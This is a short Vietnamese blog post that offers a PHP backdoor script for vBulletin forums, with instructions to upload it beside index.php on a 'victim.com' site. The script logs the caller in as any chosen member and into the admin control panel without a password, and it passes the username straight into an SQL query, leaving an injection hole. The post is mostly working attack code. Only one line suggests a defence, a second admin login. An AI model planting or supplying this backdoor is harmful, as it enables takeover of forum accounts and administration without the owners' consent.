Code này có tác dụng là khi upload vào thư mục root của forum VBB (Ngang hàng index.php) các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass
<?php
if (isset($_GET['bd']))
{
define('THIS_SCRIPT', 'login');
require_once('./global.php');
require_once('./includes/functions_login.php');
$vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'");
if (!$vbulletin->userinfo['userid']) die("Invalid username!");
else
{
vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true);
vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true);
exec_unstrike_user($_GET['bd']);
process_new_login('cplogin', TRUE, TRUE);
do_login_redirect();
}
}
?>
Cách xài:
- Copy đoạn code trên và lưu thành file php
- Up lên ngang hàng index.php
- Chạy link
http://victim.com/tên-file.php?bd=username
+ tên-file: Là tên file php bạn tạo
+ username: Nick bạn muốn login
+ Đã test trên vBulletin 4.2.2 Patch Level 4
+ Cách phòng: Tạo thêm lớp đăng nhập thứ 2 cho admincp
Nguồn: http://quylevhb.blogspot.com/2015/03/login-forum-vbb-khong-can-pass.html#ixzz3t2zHZxnI
0 Nhận xét